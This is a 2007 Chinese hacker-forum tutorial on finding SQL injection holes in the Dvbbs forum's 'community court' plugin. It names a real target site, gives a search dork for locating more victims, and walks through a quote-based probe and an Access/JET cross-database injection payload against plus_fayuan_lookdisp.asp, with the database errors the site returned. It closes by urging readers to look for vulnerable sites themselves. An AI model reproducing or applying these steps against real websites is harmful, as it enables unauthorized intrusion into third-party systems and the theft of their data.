您现在的位置: 骇客基地 >> 黑客文章 >> 黑客攻防 >> 溢出攻击 >> 正文

如何寻找动网插件的注入漏洞
骇客基地 阅读: 时间:2007-4-30 12:37:51 来源:www.hookbase.com
   在百度搜索“dvbbs 社区法院”
我只提供大家一个思路,请大家别搞破坏哦!~
这里我已经找好一个了 http://www.723500.cn/bbs
现在我来教大家找动网插件的注入漏洞
首先一样得先注册
不好意思,我刚注册了个bangbang了,嘿嘿,注册这种事就不用演示了吧!~
大家看我怎么寻找漏洞
社区设施--社区法院---状纸清单
http://www.723500.cn/bbs/plus_fayuan_lookdisp.asp?ID=1随便打开一个状纸!~
接着我们来测试下,是否存在注入漏洞
http://www.723500.cn/bbs/plus_fayuan_lookdisp.asp?ID=1在后面加个 '
Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'ID=1'' 中。

/bbs/plus_fayuan_lookdisp.asp,行 11
看到了吧?嘿嘿,再把'改为%20or%200<>(select%20count(*)%20from%20c:\winnt\system32\cmd.exe.c)
Microsoft JET Database Engine 错误 '80004005'

'c:\winnt\system32\cmd.exe'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

/bbs/plus_fayuan_lookdisp.asp,行 11
大家应该一看这个就知道这是MDB数据库,MDB数据库其实也可以跨库查询
这就给动网带来了很大的隐患,大家说是么?? 嘎嘎 :)
其实很多网站都存在这样的漏洞的,大家自己去找找就会发现的!~


by:棒棒   QQ:180180029   我建议大家加群来跟我聊,我的好友已满了,不好意思哦
恭喜,该URL可以注入!
数据库类型:Access数据库
今天广告
参与评论:
注意事项:
【如何寻找动网插件的注入漏洞】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号